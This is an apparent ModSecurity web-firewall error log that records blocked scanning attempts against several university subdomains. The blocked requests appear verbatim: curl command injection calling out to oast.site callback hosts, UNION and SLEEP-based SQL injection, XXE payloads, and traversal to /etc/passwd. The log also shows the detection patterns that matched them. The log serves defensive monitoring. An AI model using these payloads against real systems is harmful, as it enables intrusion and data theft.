[Tue Aug 29 11:31:38.502238 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:username: ;`curl cjmn8l5jmimk2adbbnlgk6iathxotzr1m.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/login"] [unique_id "ZO10qsCo-f0AAAP@M1YAAAAZ"]
[Tue Aug 29 11:31:38.512853 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:day. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:day: 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/module/smartblog/archive"] [unique_id "ZO10qsCo-f0AAAQJWvoAAAAr"]
[Tue Aug 29 11:31:38.515651 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:day. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:day: 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/module/smartblog/archive"] [unique_id "ZO10qsCo-f0AAAQEGL0AAAAm"]
[Tue Aug 29 11:31:38.608137 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:day. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:day: 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/module/smartblog/archive"] [unique_id "ZO10qsCo-f0AAAN@5HwAAAAO"]
[Tue Aug 29 11:31:38.611201 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:day. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:day: 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/module/smartblog/archive"] [unique_id "ZO10qsCo-f0AAAP8G0MAAAAV"]
[Tue Aug 29 11:31:38.668183 2023] [:error] [pid 1056] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:username: ;`curl cjmn8l5jmimk2adbbnlgm1odj9hw9uekp.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/login"] [unique_id "ZO10qsCo-f0AAAQgqUkAAAAA"]
[Tue Aug 29 11:31:38.708161 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:username: ;`curl cjmn8l5jmimk2adbbnlg6npnc6nu184to.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/login"] [unique_id "ZO10qsCo-f0AAAPMmJcAAAAY"]
[Tue Aug 29 11:31:38.714317 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:username: ;`curl cjmn8l5jmimk2adbbnlgws5js7idaz366.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/login"] [unique_id "ZO10qsCo-f0AAAPDn7MAAAAP"]
[Tue Aug 29 11:31:39.335823 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:discount_code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:discount_code: '  union select sleep(6) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO10q8Co-f0AAAP@M1kAAAAZ"]
[Tue Aug 29 11:31:39.339144 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:username: ;`curl cjmn8l5jmimk2adbbnlgydtnpq66sck5k.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/login"] [unique_id "ZO10q8Co-f0AAAQSWM4AAAA0"]
[Tue Aug 29 11:31:39.371405 2023] [:error] [pid 1027] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:payload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22 ?><! found within ARGS:payload: <?xml version=\\x221.0\\x22 ?><!DOCTYPE a [ <!ENTITY % xxe SYSTEM \\x22http://cjmn8l5jmimk2adbbnlgiwx7e8wcsqmze.oast.site\\x22>%xxe;]>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/carbon/generic/save_artifact_ajaxprocessor.jsp"] [unique_id "ZO10q8Co-f0AAAQDFUcAAAAl"]
[Tue Aug 29 11:31:39.371455 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:payload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22 ?><! found within ARGS:payload: <?xml version=\\x221.0\\x22 ?><!DOCTYPE a [ <!ENTITY % xxe SYSTEM \\x22http://cjmn8l5jmimk2adbbnlggexhzf5awdnxd.oast.site\\x22>%xxe;]>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/carbon/generic/save_artifact_ajaxprocessor.jsp"] [unique_id "ZO10q8Co-f0AAAN@5H4AAAAO"]
[Tue Aug 29 11:31:39.372935 2023] [:error] [pid 1062] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:payload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22 ?><! found within ARGS:payload: <?xml version=\\x221.0\\x22 ?><!DOCTYPE a [ <!ENTITY % xxe SYSTEM \\x22http://cjmn8l5jmimk2adbbnlg5bskd7i6ntjze.oast.site\\x22>%xxe;]>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/carbon/generic/save_artifact_ajaxprocessor.jsp"] [unique_id "ZO10q8Co-f0AAAQmR4gAAAAH"]
[Tue Aug 29 11:31:39.377276 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:day. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:day: 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/module/smartblog/archive"] [unique_id "ZO10q8Co-f0AAAQSWM8AAAA0"]
[Tue Aug 29 11:31:39.391978 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:payload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22 ?><! found within ARGS:payload: <?xml version=\\x221.0\\x22 ?><!DOCTYPE a [ <!ENTITY % xxe SYSTEM \\x22http://cjmn8l5jmimk2adbbnlgxj88fzgrx4bcd.oast.site\\x22>%xxe;]>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/carbon/generic/save_artifact_ajaxprocessor.jsp"] [unique_id "ZO10q8Co-f0AAAQFcTYAAAAn"]
[Tue Aug 29 11:31:39.450242 2023] [:error] [pid 1024] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:payload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22 ?><! found within ARGS:payload: <?xml version=\\x221.0\\x22 ?><!DOCTYPE a [ <!ENTITY % xxe SYSTEM \\x22http://cjmn8l5jmimk2adbbnlgqqrgmzq5mj34x.oast.site\\x22>%xxe;]>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/carbon/generic/save_artifact_ajaxprocessor.jsp"] [unique_id "ZO10q8Co-f0AAAQA-98AAAAi"]
[Tue Aug 29 11:31:40.363037 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "unla.ac.id"] [uri "/Config/SaveUploadedHotspotLogoFile"] [unique_id "ZO10rMCo-f0AAAPah2AAAAAL"]
[Tue Aug 29 11:31:40.388937 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "ft.unla.ac.id"] [uri "/Config/SaveUploadedHotspotLogoFile"] [unique_id "ZO10rMCo-f0AAAQEGMMAAAAm"]
[Tue Aug 29 11:31:40.391913 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "informatika.unla.ac.id"] [uri "/Config/SaveUploadedHotspotLogoFile"] [unique_id "ZO10rMCo-f0AAAQSWNMAAAA0"]
[Tue Aug 29 11:31:40.392500 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Config/SaveUploadedHotspotLogoFile"] [unique_id "ZO10rMCo-f0AAAN@5IIAAAAO"]
[Tue Aug 29 11:31:40.397431 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "journal.unla.ac.id"] [uri "/Config/SaveUploadedHotspotLogoFile"] [unique_id "ZO10rMCo-f0AAAQNwHUAAAAv"]
[Tue Aug 29 11:31:40.405006 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:payload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22 ?><! found within ARGS:payload: <?xml version=\\x221.0\\x22 ?><!DOCTYPE a [ <!ENTITY % xxe SYSTEM \\x22http://cjmn8l5jmimk2adbbnlg1yfe9t7oggzeg.oast.site\\x22>%xxe;]>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/carbon/generic/save_artifact_ajaxprocessor.jsp"] [unique_id "ZO10rMCo-f0AAAP8G0oAAAAV"]
[Tue Aug 29 11:31:41.596990 2023] [:error] [pid 1062] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at REQUEST_COOKIES:wpsc_guest_login_auth. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within REQUEST_COOKIES:wpsc_guest_login_auth: {\\x22email\\x22:\\x22' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO10rcCo-f0AAAQmR48AAAAH"]
[Tue Aug 29 11:31:41.612240 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at REQUEST_COOKIES:wpsc_guest_login_auth. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within REQUEST_COOKIES:wpsc_guest_login_auth: {\\x22email\\x22:\\x22' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO10rcCo-f0AAAQSWNQAAAA0"]
[Tue Aug 29 11:31:41.618163 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at REQUEST_COOKIES:wpsc_guest_login_auth. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within REQUEST_COOKIES:wpsc_guest_login_auth: {\\x22email\\x22:\\x22' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO10rcCo-f0AAAPah2MAAAAL"]
[Tue Aug 29 11:31:41.715290 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at REQUEST_COOKIES:wpsc_guest_login_auth. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within REQUEST_COOKIES:wpsc_guest_login_auth: {\\x22email\\x22:\\x22' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO10rcCo-f0AAAQJWwEAAAAr"]
[Tue Aug 29 11:31:41.733377 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at REQUEST_COOKIES:wpsc_guest_login_auth. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within REQUEST_COOKIES:wpsc_guest_login_auth: {\\x22email\\x22:\\x22' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO10rcCo-f0AAAQFcT0AAAAn"]
[Tue Aug 29 11:31:42.308147 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "www.unla.ac.id"] [uri "/Config/SaveUploadedHotspotLogoFile"] [unique_id "ZO10rsCo-f0AAAPiBkcAAAAB"]
[Tue Aug 29 11:31:42.324513 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at REQUEST_COOKIES:wpsc_guest_login_auth. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within REQUEST_COOKIES:wpsc_guest_login_auth: {\\x22email\\x22:\\x22' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO10rsCo-f0AAAPxBXMAAAAS"]
[Tue Aug 29 11:31:43.328141 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:folder. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:folder: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10r8Co-f0AAAPiBkkAAAAB"]
[Tue Aug 29 11:31:43.328956 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:folder. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:folder: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10r8Co-f0AAAQMrvEAAAAu"]
[Tue Aug 29 11:31:43.331535 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:folder. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:folder: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO10r8Co-f0AAAPah2cAAAAL"]
[Tue Aug 29 11:31:43.336585 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:folder. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:folder: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10r8Co-f0AAAP5mKAAAAAM"]
[Tue Aug 29 11:31:43.341011 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:folder. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:folder: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10r8Co-f0AAAQV4OwAAAA3"]
[Tue Aug 29 11:31:43.388722 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:folder. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:folder: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10r8Co-f0AAAPxBXYAAAAS"]
